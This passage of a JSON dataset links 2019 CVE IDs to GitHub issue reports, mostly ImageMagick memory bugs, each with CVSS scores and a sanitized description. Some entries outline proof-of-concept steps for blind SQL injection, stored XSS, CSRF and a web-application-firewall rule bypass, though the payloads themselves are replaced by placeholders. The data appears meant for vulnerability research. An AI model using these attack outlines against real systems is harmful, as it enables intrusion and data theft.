  36291. "description": "heap buffer overflow in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in APITAG in . APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
  36292. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36293. "severity": "HIGH",
  36294. "baseScore": 8.8,
  36295. "impactScore": 5.9,
  36296. "exploitabilityScore": 2.8
  36297. },
  36298. {
  36299. "CVE_ID": "CVE-2019-13301",
  36300. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1589",
  36301. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1589",
  36302. "Repo_new": "imagemagick/imagemagick",
  36303. "Issue_Created_At": "2019-06-11T05:31:32Z",
  36304. "description": "heap use after free in APITAG and double free in APITAG of APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are a heap use after free(sometimes heap buffer overflow) vulnerability in APITAG in . APITAG and a double free bug in APITAG APITAG with the same input. For each run, different bugs are triggered so please run the command for many times. related NUMBERTAG URLTAG Steps to Reproduce APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG version: Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
  36305. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36306. "severity": "MEDIUM",
  36307. "baseScore": 6.5,
  36308. "impactScore": 3.6,
  36309. "exploitabilityScore": 2.8
  36310. },
  36311. {
  36312. "CVE_ID": "CVE-2019-13301",
  36313. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1585",
  36314. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1585",
  36315. "Repo_new": "imagemagick/imagemagick",
  36316. "Issue_Created_At": "2019-06-10T14:34:22Z",
  36317. "description": "heap buffer overflow in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a heap buffer overflow vulnerability in APITAG in . APITAG It sometimes doesn't occur so needs to be executed for several times. I found that this bug is not reproduced but it is reproduced with certain arguments. closed report URLTAG APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
  36318. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36319. "severity": "MEDIUM",
  36320. "baseScore": 6.5,
  36321. "impactScore": 3.6,
  36322. "exploitabilityScore": 2.8
  36323. },
  36324. {
  36325. "CVE_ID": "CVE-2019-13302",
  36326. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1597",
  36327. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1597",
  36328. "Repo_new": "imagemagick/imagemagick",
  36329. "Issue_Created_At": "2019-06-17T03:51:17Z",
  36330. "description": "heap buffer overflow in APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow in APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36331. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36332. "severity": "HIGH",
  36333. "baseScore": 8.8,
  36334. "impactScore": 5.9,
  36335. "exploitabilityScore": 2.8
  36336. },
  36337. {
  36338. "CVE_ID": "CVE-2019-13303",
  36339. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1603",
  36340. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1603",
  36341. "Repo_new": "imagemagick/imagemagick",
  36342. "Issue_Created_At": "2019-06-18T17:08:25Z",
  36343. "description": "heap buffer overflow in APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow in APITAG in APITAG I compiled APITAG with disable openmp option. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36344. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36345. "severity": "HIGH",
  36346. "baseScore": 8.8,
  36347. "impactScore": 5.9,
  36348. "exploitabilityScore": 2.8
  36349. },
  36350. {
  36351. "CVE_ID": "CVE-2019-13304",
  36352. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1614",
  36353. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1614",
  36354. "Repo_new": "imagemagick/imagemagick",
  36355. "Issue_Created_At": "2019-06-21T06:36:50Z",
  36356. "description": "stack buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a stack buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36357. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36358. "severity": "HIGH",
  36359. "baseScore": 7.8,
  36360. "impactScore": 5.9,
  36361. "exploitabilityScore": 1.8
  36362. },
  36363. {
  36364. "CVE_ID": "CVE-2019-13305",
  36365. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1613",
  36366. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1613",
  36367. "Repo_new": "imagemagick/imagemagick",
  36368. "Issue_Created_At": "2019-06-21T06:23:44Z",
  36369. "description": "stack buffer overflow at APITAG in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a stack buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36370. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36371. "severity": "HIGH",
  36372. "baseScore": 7.8,
  36373. "impactScore": 5.9,
  36374. "exploitabilityScore": 1.8
  36375. },
  36376. {
  36377. "CVE_ID": "CVE-2019-13306",
  36378. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1612",
  36379. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1612",
  36380. "Repo_new": "imagemagick/imagemagick",
  36381. "Issue_Created_At": "2019-06-21T06:13:39Z",
  36382. "description": "stack buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a stack buffer overflow at APITAG in APITAG I think this is related with NUMBERTAG URLTAG , but it was heap and this issue is about the stack buffer overflow. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36383. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36384. "severity": "HIGH",
  36385. "baseScore": 7.8,
  36386. "impactScore": 5.9,
  36387. "exploitabilityScore": 1.8
  36388. },
  36389. {
  36390. "CVE_ID": "CVE-2019-13307",
  36391. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1615",
  36392. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1615",
  36393. "Repo_new": "imagemagick/imagemagick",
  36394. "Issue_Created_At": "2019-06-22T02:11:22Z",
  36395. "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36396. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36397. "severity": "HIGH",
  36398. "baseScore": 7.8,
  36399. "impactScore": 5.9,
  36400. "exploitabilityScore": 1.8
  36401. },
  36402. {
  36403. "CVE_ID": "CVE-2019-13308",
  36404. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1595",
  36405. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1595",
  36406. "Repo_new": "imagemagick/imagemagick",
  36407. "Issue_Created_At": "2019-06-17T02:21:01Z",
  36408. "description": "heap buffer overflow in APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow in APITAG in APITAG and I compiled the lasted version with disable openmp option. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36409. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36410. "severity": "HIGH",
  36411. "baseScore": 8.8,
  36412. "impactScore": 5.9,
  36413. "exploitabilityScore": 2.8
  36414. },
  36415. {
  36416. "CVE_ID": "CVE-2019-13309",
  36417. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1616",
  36418. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1616",
  36419. "Repo_new": "imagemagick/imagemagick",
  36420. "Issue_Created_At": "2019-06-23T08:45:54Z",
  36421. "description": "memory leaks is detected at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's memory leaks in APITAG This issue is maybe related with NUMBERTAG URLTAG . Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36422. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36423. "severity": "MEDIUM",
  36424. "baseScore": 6.5,
  36425. "impactScore": 3.6,
  36426. "exploitabilityScore": 2.8
  36427. },
  36428. {
  36429. "CVE_ID": "CVE-2019-13311",
  36430. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1623",
  36431. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1623",
  36432. "Repo_new": "imagemagick/imagemagick",
  36433. "Issue_Created_At": "2019-07-01T18:19:43Z",
  36434. "description": "memory leaks is detected at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's memory leaks which are detected at APITAG This maybe relates with NUMBERTAG URLTAG . Steps to Reproduce APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp without png and I also tested on Ubuntu NUMBERTAG with clang NUMBERTAG and gcc NUMBERTAG APITAG",
  36435. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36436. "severity": "MEDIUM",
  36437. "baseScore": 6.5,
  36438. "impactScore": 3.6,
  36439. "exploitabilityScore": 2.8
  36440. },
  36441. {
  36442. "CVE_ID": "CVE-2019-13339",
  36443. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/32",
  36444. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/32",
  36445. "Repo_new": "bg5sbk/minicms",
  36446. "Issue_Created_At": "2019-07-04T10:12:43Z",
  36447. "description": "Another XSS found. POC NUMBERTAG Enter setting page FILETAG NUMBERTAG Upload the payload in comment FILETAG NUMBERTAG Then write an article and set the comment code into true and save FILETAG NUMBERTAG When someone is reading the article, there will be FILETAG",
  36448. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  36449. "severity": "MEDIUM",
  36450. "baseScore": 4.8,
  36451. "impactScore": 2.7,
  36452. "exploitabilityScore": 1.7
  36453. },
  36454. {
  36455. "CVE_ID": "CVE-2019-13351",
  36456. "Issue_Url_old": "https://github.com/xbmc/xbmc/issues/16258",
  36457. "Issue_Url_new": "https://github.com/xbmc/xbmc/issues/16258",
  36458. "Repo_new": "xbmc/xbmc",
  36459. "Issue_Created_At": "2019-06-10T23:45:04Z",
  36460. "description": "Sporadic crash when during on my APITAG due to double APITAG on the same fd in APITAG Bug report Describe the bug Here is a clear and concise description of what the problem is: Kodi crashes sporadically when I turn on my TV and receiver since I upgraded to Ubuntu NUMBERTAG There is a double close somewhere on the APITAG thread which is racing against the APITAG libudev has an assert when close returns EBADF. When I turn the TV on, it triggers udev_enumerate_scan_devices. This has been difficult to debug due to the sporadic nature of the race condition. I've straced kodi NUMBERTAG with APITAG calls, but if I add openat to the list, it disturbs the timing enough that I haven't been able to reproduce with that strace attached. It happens at least NUMBERTAG of the time turning my TV on with no strace attached. Expected Behavior Here is a clear and concise description of what was expected to happen: Kodi should not crash sporadically when turning on my TV. Actual Behavior Kodi crashes sporadically when turning on my TV. Possible Fix To Reproduce Steps to reproduce the behavior NUMBERTAG Boot machine with auto login to kodi. I'm using ALSA HDMI audio. The EDID is fixed NUMBERTAG Turn my TV on. This triggers the receiver on via CEC NUMBERTAG Kodi crashes. Debuglog The debuglog can be found here: APITAG is not on for this log because it disturbs the timing enough to mess with the race condition, and makes it hard to reproduce): FILETAG Stack strace from the core dump, it asserts inside libudev due to the double close on the other thread: FILETAG List of thread names for the tids: FILETAG Tail of the an strace showing the double close on the APITAG thread: FILETAG Screenshots Here are some links or screenshots to help explain the problem: Additional context or screenshots (if appropriate) Here is some additional context or explanation that might help: Your Environment Used Operating system: [ ] Android [ ] iOS [x] Linux [ ] OSX [ ] Raspberry Pi [ ] Windows [ ] Windows UWP Operating system version/name: Ubuntu NUMBERTAG Kodi version NUMBERTAG note: Once the issue is made we require you to update it with new information or Kodi versions should that be required. Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.",
  36461. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36462. "severity": "HIGH",
  36463. "baseScore": 8.1,
  36464. "impactScore": 5.9,
  36465. "exploitabilityScore": 2.2
  36466. },
  36467. {
  36468. "CVE_ID": "CVE-2019-13362",
  36469. "Issue_Url_old": "https://github.com/michaelrsweet/codedoc/issues/5",
  36470. "Issue_Url_new": "https://github.com/michaelrsweet/codedoc/issues/5",
  36471. "Repo_new": "michaelrsweet/codedoc",
  36472. "Issue_Created_At": "2019-07-03T08:29:50Z",
  36473. "description": "stack buffer overflow in codedoc_strlcpy APITAG PATHTAG ./codedoc poc2 FILETAG asan output ERRORTAG gcc output ERRORTAG",
  36474. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36475. "severity": "HIGH",
  36476. "baseScore": 7.8,
  36477. "impactScore": 5.9,
  36478. "exploitabilityScore": 1.8
  36479. },
  36480. {
  36481. "CVE_ID": "CVE-2019-13370",
  36482. "Issue_Url_old": "https://github.com/ignitedcms/ignitedcms/issues/7",
  36483. "Issue_Url_new": "https://github.com/ignitedcms/ignitedcms/issues/7",
  36484. "Repo_new": "ignitedcms/ignitedcms",
  36485. "Issue_Created_At": "2019-07-02T02:36:52Z",
  36486. "description": "A CSRF vulnerability exists. When the administrator logs in, open the POC page constructed by the attacker and a new user will be automatically added. POC\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  36487. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36488. "severity": "HIGH",
  36489. "baseScore": 8.8,
  36490. "impactScore": 5.9,
  36491. "exploitabilityScore": 2.8
  36492. },
  36493. {
  36494. "CVE_ID": "CVE-2019-13391",
  36495. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1588",
  36496. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1588",
  36497. "Repo_new": "imagemagick/imagemagick",
  36498. "Issue_Created_At": "2019-06-11T03:25:05Z",
  36499. "description": "heap buffer overflow in APITAG or heap use after free in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow in APITAG in . APITAG or a heap use after free in APITAG in APITAG with the same input. Heap buffer overflow sometimes occur and heap use after free is rarely found with the same command. To trigger these bugs, please run the command for many times. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
  36500. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36501. "severity": "HIGH",
  36502. "baseScore": 8.8,
  36503. "impactScore": 5.9,
  36504. "exploitabilityScore": 2.8
  36505. },
  36506. {
  36507. "CVE_ID": "CVE-2019-13445",
  36508. "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1738",
  36509. "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1738",
  36510. "Repo_new": "ros/ros_comm",
  36511. "Issue_Created_At": "2019-07-02T21:42:17Z",
  36512. "description": "potential integer overflow. Potentially overflowing expression NUMBERTAG S\" with type \"int NUMBERTAG bits, signed) is evaluated using NUMBERTAG bit arithmetic, and then used in a context that expects an expression of type \"uint NUMBERTAG t NUMBERTAG bits, unsigned). URLTAG To avoid overflow, cast either NUMBERTAG or \"S\" to type \"uint NUMBERTAG t\".",
  36513. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36514. "severity": "CRITICAL",
  36515. "baseScore": 9.8,
  36516. "impactScore": 5.9,
  36517. "exploitabilityScore": 3.9
  36518. },
  36519. {
  36520. "CVE_ID": "CVE-2019-13454",
  36521. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1629",
  36522. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1629",
  36523. "Repo_new": "imagemagick/imagemagick",
  36524. "Issue_Created_At": "2019-07-07T02:34:55Z",
  36525. "description": "Division by Zero at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a division by zero at APITAG Steps to Reproduce APITAG columns != next >columns || curr >rows != next >rows NUMBERTAG curr >page.x != next >page.x || curr >page.y != next >page.y NUMBERTAG continue NUMBERTAG APITAG NUMBERTAG if ( bounds.x APITAG delay NUMBERTAG curr >ticks_per_second NUMBERTAG time += next >delay NUMBERTAG next >ticks_per_second NUMBERTAG next >ticks_per_second NUMBERTAG L NUMBERTAG next >delay = time curr >ticks_per_second NUMBERTAG next >iterations = curr >iterations NUMBERTAG images = curr NUMBERTAG oid) APITAG NUMBERTAG APITAG APITAG runtime error: division by zero SUMMARY: APITAG undefined behavior APITAG in APITAG APITAG NUMBERTAG ERROR: APITAG UNKNOWN SIGNAL on unknown address NUMBERTAG pc NUMBERTAG fe NUMBERTAG baee9e7 bp NUMBERTAG ffc NUMBERTAG e NUMBERTAG sp NUMBERTAG ffc NUMBERTAG e NUMBERTAG ec0 T NUMBERTAG fe NUMBERTAG baee9e6 in APITAG APITAG NUMBERTAG fe NUMBERTAG a NUMBERTAG a8 in APITAG APITAG NUMBERTAG fe NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG fe NUMBERTAG c6aef4 in APITAG APITAG APITAG NUMBERTAG fe NUMBERTAG c6dc NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fe NUMBERTAG d NUMBERTAG e in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG e1 in main APITAG NUMBERTAG fe NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG UNKNOWN SIGNAL APITAG in APITAG NUMBERTAG ABORTING ` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG CFLAGS=\" fsanitize=address,undefined g\" CXXFLAGS=\" fsanitize=address,undefined g\" ./configure disable openmp without png APITAG",
  36526. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36527. "severity": "MEDIUM",
  36528. "baseScore": 6.5,
  36529. "impactScore": 3.6,
  36530. "exploitabilityScore": 2.8
  36531. },
  36532. {
  36533. "CVE_ID": "CVE-2019-13464",
  36534. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1386",
  36535. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1386",
  36536. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  36537. "Issue_Created_At": "2019-05-04T03:56:08Z",
  36538. "description": "Bypass rule PHP Script Uploads with id NUMBERTAG and id NUMBERTAG Type of Issue Incorrect blocking (false positive) Description I bypassed this pull issue NUMBERTAG URLTAG In rule id NUMBERTAG This behavior return true ERRORTAG But, by replacing APITAG to APITAG CODETAG in my php application, that understanding APITAG is APITAG request: APITAG response: FILETAG And a rule id NUMBERTAG is the same Your Environment I tested my ubuntu NUMBERTAG PHP version NUMBERTAG and the latest version crs APITAG Confirmation [X] I have removed any personal data (email addresses, IP addresses, passwords, domain names) from any logs posted.",
  36539. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  36540. "severity": "HIGH",
  36541. "baseScore": 7.5,
  36542. "impactScore": 3.6,
  36543. "exploitabilityScore": 3.9
  36544. },
  36545. {
  36546. "CVE_ID": "CVE-2019-13465",
  36547. "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1748",
  36548. "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1748",
  36549. "Repo_new": "ros/ros_comm",
  36550. "Issue_Created_At": "2019-07-09T17:55:55Z",
  36551. "description": "Coverity invalidate iterator cause overflow. When ROS_ASSERT_ENABLED is not defined the following iterator will overflow: URLTAG",
  36552. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
  36553. "severity": "HIGH",
  36554. "baseScore": 8.6,
  36555. "impactScore": 4.0,
  36556. "exploitabilityScore": 3.9
  36557. },
  36558. {
  36559. "CVE_ID": "CVE-2019-13488",
  36560. "Issue_Url_old": "https://github.com/jofpin/trape/issues/169",
  36561. "Issue_Url_new": "https://github.com/jofpin/trape/issues/169",
  36562. "Repo_new": "jofpin/trape",
  36563. "Issue_Created_At": "2019-06-15T05:39:49Z",
  36564. "description": "Stored XSS in PATHTAG Overview User input is embedded in admin interface through APITAG unsafe APITAG method. This leads to Cross site Scripting attack. The vulnerability is in URLTAG The vulnerable parameters are ERRORTAG sent in APITAG request. Proof of concept NUMBERTAG APITAG NUMBERTAG Send the following HTTP request ERRORTAG NUMBERTAG Open the Control Panel link , we see APITAG box.",
  36565. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  36566. "severity": "MEDIUM",
  36567. "baseScore": 6.1,
  36568. "impactScore": 2.7,
  36569. "exploitabilityScore": 2.8
  36570. },
  36571. {
  36572. "CVE_ID": "CVE-2019-13489",
  36573. "Issue_Url_old": "https://github.com/jofpin/trape/issues/168",
  36574. "Issue_Url_new": "https://github.com/jofpin/trape/issues/168",
  36575. "Repo_new": "jofpin/trape",
  36576. "Issue_Created_At": "2019-06-14T09:39:23Z",
  36577. "description": "Blind SQL injection in core/db.py. Description User input is not escaped when building SQL command. As a result, the application is vulnerable to SQL injection attack. Proof of concept NUMBERTAG APITAG NUMBERTAG Send the following HTTP request CODETAG NUMBERTAG The final SQL query is: CODETAG NUMBERTAG If the condition inside APITAG is true, APITAG is executed, which leads to large delay and/or returned status code of NUMBERTAG This enable attacker to run a blind SQL injection attack. Impact Dump the whole database of trape . How to fix The vulnerability is in URLTAG The APITAG variable is manually concatenated to the SQL command. To fix this, developer can whitelist APITAG variable before constructing SQL query.",
  36578. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36579. "severity": "CRITICAL",
  36580. "baseScore": 9.8,
  36581. "impactScore": 5.9,
  36582. "exploitabilityScore": 3.9
  36583. },
  36584. {
  36585. "CVE_ID": "CVE-2019-13506",
  36586. "Issue_Url_old": "https://github.com/Rich-Harris/devalue/issues/19",
  36587. "Issue_Url_new": "https://github.com/rich-harris/devalue/issues/19",
  36588. "Repo_new": "rich-harris/devalue",
  36589. "Issue_Created_At": "2019-04-12T21:54:12Z",
  36590. "description": "Security: APITAG XSS. As shown in URLTAG and URLTAG devalue exposes a XSS vulnerability, when an object key contains unsafe characters. From the issue: > I think it should be safe to use the same approach as in serialize javascript to replace unsafe characters: URLTAG",
  36591. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  36592. "severity": "MEDIUM",
  36593. "baseScore": 6.1,
  36594. "impactScore": 2.7,
  36595. "exploitabilityScore": 2.8
  36596. },
  36597. {
  36598. "CVE_ID": "CVE-2019-13566",
  36599. "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1735",
  36600. "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1735",
  36601. "Repo_new": "ros/ros_comm",
  36602. "Issue_Created_At": "2019-07-02T19:28:39Z",
  36603. "description": "Coverity report potential string overflow in APITAG NUMBERTAG Event fixed_size_dest: You might overrun the NUMBERTAG character fixed size string \"namebuf\" by copying the return value of \"inet_ntoa\" without checking the length. URLTAG",
  36604. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36605. "severity": "CRITICAL",
  36606. "baseScore": 9.8,
  36607. "impactScore": 5.9,
  36608. "exploitabilityScore": 3.9
  36609. },
  36610. {
  36611. "CVE_ID": "CVE-2019-13566",
  36612. "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1752",
  36613. "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1752",
  36614. "Repo_new": "ros/ros_comm",
  36615. "Issue_Created_At": "2019-07-10T19:24:37Z",
  36616. "description": "Potential buffer overflow. Copy the Internet host address of address >sin_addr to local variable with checking the buffer length, can cause potential buffer overflow if using a IP address with a long hostname that is obtained via a reverse DNS lookup URLTAG",
  36617. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36618. "severity": "CRITICAL",
  36619. "baseScore": 9.8,
  36620. "impactScore": 5.9,
  36621. "exploitabilityScore": 3.9
  36622. },
  36623. {
  36624. "CVE_ID": "CVE-2019-13589",
  36625. "Issue_Url_old": "https://github.com/rubygems/rubygems.org/issues/2051",
